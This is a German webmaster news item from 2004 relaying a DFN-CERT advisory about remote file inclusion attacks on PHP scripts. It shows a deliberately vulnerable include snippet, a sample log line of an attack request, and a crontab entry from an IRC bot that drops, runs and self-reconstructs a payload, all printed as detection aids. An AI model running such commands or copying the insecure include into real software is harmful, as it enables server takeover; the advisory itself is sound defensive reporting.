kostenlos Registrieren

Navigation
Startseite
Fachbücher
Forum
Webmaster News
Script Newsletter
Kontakt
Script Installation
Php
Php Tutorials
Impressum

Community-Bereich
kostenlos Registrieren
Anmelden
Benutzerliste

Script Datenbank
Script Archiv
Script Top 20
Screenshots
Testberichte

Unsere Php Scripts
Counter Script
Umfrage Script
Bilder Upload Script
Terminverwaltung
Simple PHP Forum
RSS Grabber

Script Mods
phpBB Adsense Mode

Tools und Generatoren
.htpasswd Generator
md5 Generator
base64 Generator
Markdown to HTML
Colorpicker
Unix timestamp Tool
TLD Liste
Webkatalog‑Verzeichnis

Partner
Sprüche Treff

Artfiles.de
Bietet Serviceorientierte Internetdienstleistungen...
https://www.Artfiles.de

Hosterplus.de
Bekommen Sie Speicherplatz (Webspace), Domains und...
https://www.Hosterplus.de

DFN-CERT warnt vor Angriffen auf Webserver mit unsicheren PHP-Skripten

Sie befinden sich: Home > Webmaster News

Das DFN-CERT und weitere deutsche CERTs (Computer Emergency Response Teams) registrieren nach eigenen Angaben zurzeit massive Angriffe auf Webserver mit unsicheren PHP-Skripten. In diese Skripte lässt sich weiterer Skript-Code einschleusen, der beispielsweise von einem anderem Webserver nachgeladen und ausgeführt wird. Laut Meldung finden sich auf bereits kompromittierten Systemen IRC-Bots, über die der Rechner fernsteuerbar ist und für weitere Angriffe missbraucht werden kann.

Betroffen sind Systeme, bei denen in der php.ini die Option allow_url_fopen = on gesetzt ist und sich ein Skript aufrufen lässt, das dynamisch Code nachlädt, beispielsweise so:

<?php
if ( !isset( $realm) ) { 
include "home.template" ; 
} else { 
include $realm ; 
}
?>

Anstelle des Pfades zu einer lokalen Datei ist es so möglich, eine URL zu einer Datei auf einem Webserver anzugeben. Der include-Befehl lädt das Skript von dort aus nach und bindet ihn ein. Liegt der Exploit-Code bereit und ist ein verwundbares Skript gefunden, kann ein Angreifer über einen einzigen HTTP-Get-Request die Attacke starten.

Das DFN-CERT rät, derart konfigurierte Systeme nach Einbruchsspuren zu untersuchen. Sollte in den Logdateien des eigenen Webservers Einträge wie:

[28/Sep/2004:18:03:07 +0200] "GET 
/pfad/zu/einem/script.php?
variablenname=https://192.168.1.2:4213/
HTTP/1.0" 200 15183 "-" "Wget/1.8.1"

oder ähnliche vorhanden sein, ist das System eventuell bereits kompromittiert. Der IRC-Bot soll sich anhand eines Eintrages in der Crontab erkennen lassen:

# "17710511410 [...] 0037777777777" >
/tmp/tblihjauk ; chmod 700 /tmp/tblihjauk ; 
/tmp/tblihjauk x ; rm -f /tmp/tblihjauk34 
* * * * /bin/echo `crontab -l|grep '.{666}'
|sed 's/^./echo -e -n/'`|sh

Nach ersten Erkenntnissen wurden bislang nur Linux-Systeme kompromittiert, allerdings ist die Lücke prinzipiell auch unter anderen Betriebssystemen ausnutzbar.

(Quelle: www.heise.de)

Eingetragen am 18.10.2004

Letzten Webmaster News

15.11.2024

- PHP 8.4 und 8.5: Neue Features und Highlights im Überblick

03.09.2024

- PHP 8.3.11 Veröffentlicht: Was Entwickler jetzt wissen müssen

28.08.2024

- Agilität in der Kritik: Warum agile Methoden ins Wanken geraten

05.08.2024

- Wichtige Änderungen im PHP 8.3.10 Update

25.07.2024

- Gefahr auf GitHub: Private und gelöschte Repositories öffentlich ...

Alle Webmaster News Anzeigen

Schreib ein Kommentar

Webhosting Service